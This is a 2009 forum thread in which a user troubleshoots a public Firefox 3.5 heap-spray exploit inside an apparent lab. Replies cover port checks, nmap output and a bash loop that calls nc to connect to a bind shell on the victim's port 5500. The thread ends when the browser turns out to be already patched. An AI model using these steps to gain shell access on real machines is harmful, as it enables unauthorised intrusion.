Results 1 to 9 of 9

Thread: Testing a exploit - connection but no action

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Default Testing a exploit - connection but no action

    Hey guys,

    I tried pulling a exploit off milw0rm - Mozilla Firefox 3.5 Heap Spray Exploit to be exact - and I've gone ahead and set it up running. It tells me to have someone connect on port 80 but when I do, nothing happens. Firefox just says "Failed to establish a connection".

    I've checked nmap and the port does open so it appears the exploit is trying to do its job. Tcpdump also shows there is an attempt of a connection of some sort.

    Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit <-- Link to the exploit im trying to use.

    Results from konsole:

    Listening on port 80.
    Have someone connect to you.

    Type <control>-c to exit..


    Any idea whats not working here? If you need any more info to be able to help me - let me know and Ill be glad to share.

    Thanks in advance,

    Wolf

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    I'm wondering - are you making the completely un-obvious mistake of thinking that because nothing appears you have not got a connection?

    After a small amount of time, try typing "id" and hitting enter (obviously without the quotes).

    Just curious, I've seen it before (but haven't tried this one out just yet I think, so might not be the case).

    Also does tcpdump ONLY show one "attempt" at connection, or do you get the full SYN/SYN+ACK/ACK going... and then the blank screen?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Are you using a vulnerable version of the browser?

  4. #4
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default

    And don't forget to shut down apache before starting metasploit:

    /etc/init.d/apache2 stop

    And Gitsnik is right, do you see the SYN, SYN/ACK, ACK?
    Auswaertsspiel

  5. #5
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Default My results

    Ok so this is what i get:

    Type <control>-c to exit..
    10.0.1.7 - - [20/Sep/2009 17:18:39] "GET / HTTP/1.1" 200 -


    [-] Exploit sent... [-]
    [-] Wait about 30 seconds and attempt to connect.[-]
    [-] Connect to IP Address: 10.0.1.7 and port 5500 [-]
    10.0.1.7 - - [20/Sep/2009 17:18:40] "GET /favicon.ico HTTP/1.1" 200 -
    10.0.1.7 - - [20/Sep/2009 17:18:43] "GET /favicon.ico HTTP/1.1" 200 -
    id

    .

    I am fairly certain this is a vulnerable version im running - since it matches the exploit specs. Anyone test this out before? Im used to running exploits with metasploit - if I run it individually like this are there some commands I should be using?

  6. #6
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    Firefox crash very fast on this one. So, when u start the exploit and run
    nmap you will get.

    ~nmap -sS -p 5500 192.168.1.3

    Starting Nmap 4.85BETA10 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2009-09-21 03:01 CEST
    Interesting ports on sp3-a27ca57edb8 (192.168.1.3):
    PORT STATE SERVICE
    5500/tcp open hotline
    MAC Address: 00:0C:29:05:3B:53 (VMware)

    but only after sec or less the nmap show the that port is closed

    Starting Nmap 4.85BETA10 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2009-09-21 03:01 CEST
    Interesting ports on sp3-a27ca57edb8 (192.168.1.3):
    PORT STATE SERVICE
    5500/tcp closed hotline
    MAC Address: 00:0C:29:05:3B:53 (VMware)

    Code:
    [-] Wait about 30 seconds and attempt to connect.[-]
    I'm not sure about the 30sec so i found the solution.
    Make some loop for "nc [victim box] 5500" and start it before the firefox try to connect to attackers 80. So that 5500 port won't close before you connect with nc to it.

    Code:
    #!/bin/bash
    
    while [ 1 ]
    
    do
    
    nc 192.168.1.3 5500
    
    sleep 1
    
    done
    And you will get cmd with no problem ,with this exploit from milw0rm.

    One more thing i forgot,
    it is a bindshell there, as you can see in the exploit.
    Code:
    // windows/shell_bind_tcp - 317 byte
    So you got to connect to the port (5500 port) that opens on victim box. As i explained in earlier reply.
    You were probably useing reverse_tcp with the msf. And the meterpreter.

    so,

    Code:
    Im used to running exploits with metasploit - if I run it individually like this are there some commands I should be using?
    It's a raw binding of shell to port. No meterpreter commands, just cmd. I think.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Default

    Thanks for the reply.

    I tested out the NC bash script but it didnt work for me. I just get a connection timed out from nc results. So still no success on this exploit for me

    Any tips?

    Side Note: to others.... be sure to check your iptables! My original troubles in this was a result from previous iptable settings.

    Hopefully this isnt the case....the sploit says version 3.5 - im on 3.5.3 .....?

  8. #8
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    Quote Originally Posted by wolf17 View Post

    Hopefully this isnt the case....the sploit says version 3.5 - im on 3.5.3 .....?
    Isn't that the latest release? If so, it's probably not vulnerable.

    edit: http://blog.mozilla.com/security/200...in-firefox-35/

    Update: This vulnerability has been fixed in Firefox 3.5.1, released Thursday, July 16, 2009

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    22

    Default

    Thanks for the link.

    Yep seems its patched.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •